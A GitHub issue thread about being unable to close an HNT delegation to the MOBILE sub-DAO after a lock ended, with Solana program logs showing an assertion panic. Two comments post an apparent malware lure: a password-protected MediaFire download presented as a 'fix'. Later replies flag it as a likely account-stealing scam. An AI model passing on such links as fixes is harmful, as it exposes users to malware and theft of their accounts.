### ISSUE TITLE
Unable to Un-Delegate HNT after lock period ended

### ISSUE THREAD

**Issue by JThobbyist** [helium/helium-program-library#699]
As the title says, I locked HNT and delegated to MOBILE Sub-Dao for like 6 months. Now the lock period is over and I've already claimed all my rewards but I can't un-delegate my HNT (and therefore I can't unlock them and return them to my wallet). 

Here is the simulation error output which is essentially identical to the live output (I've just tried it so many times I don't want to waste any more of my SOL on the transaction fees)

I'm using the Helium Wallet App v2.8.5 on Mainnet-Beta. 

Helium Sub Daos Instruction
> Program logged: "Instruction: CloseDelegationV0"
> Program logged: "Vehnt calculations: VehntInfo { has_genesis: false, vehnt_at_curr_ts: 213082178304160324708269, pre_genesis_end_fall_rate: 0, post_genesis_end_fall_rate: 13476661593099949, genesis_end_vehnt_correction: 0, genesis_end_fall_rate_correction: 0, end_vehnt_correction: 323332064941653982749, end_fall_rate_correction: 13476661593099949 }"
> Program logged: "panicked at 'assertion failed: (ctx.accounts.delegated_position.last_claimed_epoch >= to_claim_to_epoch) ||\n TESTING', programs/helium-sub-daos/src/instructions/delegation/close_delegation_v0.rs:129:3"
> Program consumed: 47044 of 219701 compute units
> Program returned error: "SBF program panicked"

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by JThobbyist** [comment]
> to fix your trouble try download this fix, i see it in another issue,
> 
> https://app.mediafire.com/6mkbh6xhau31g
> 
> password: changeme
> 
> when you installing, you need to place a check in install to path and select "gcc."

This seems mighty sus 🧐. Is there a fix that will be pushed to the iOS app?

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ZhianLin** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

This may be a virus that setals accounts.Currently, there ara over 900 ISSUES with repeated replies and link addresses.

**Comment by JThobbyist** [comment]
Well, I waited an extra day after the lock period ended and tried again and, lo and behold, it worked properly. I was able to undelegate and unlock. Weird because the lock countdown got pretty specific towards the end, denoting the hours, so it was definitely over when I created this issue. 

I guess the next big issue is how to auto-perma-ban these scammers (or scam-bots?) lol

**Comment by abhay** [comment]
Indeed. The scam bots are quick. Sorry you had to deal with that and I'm glad you're all settled.
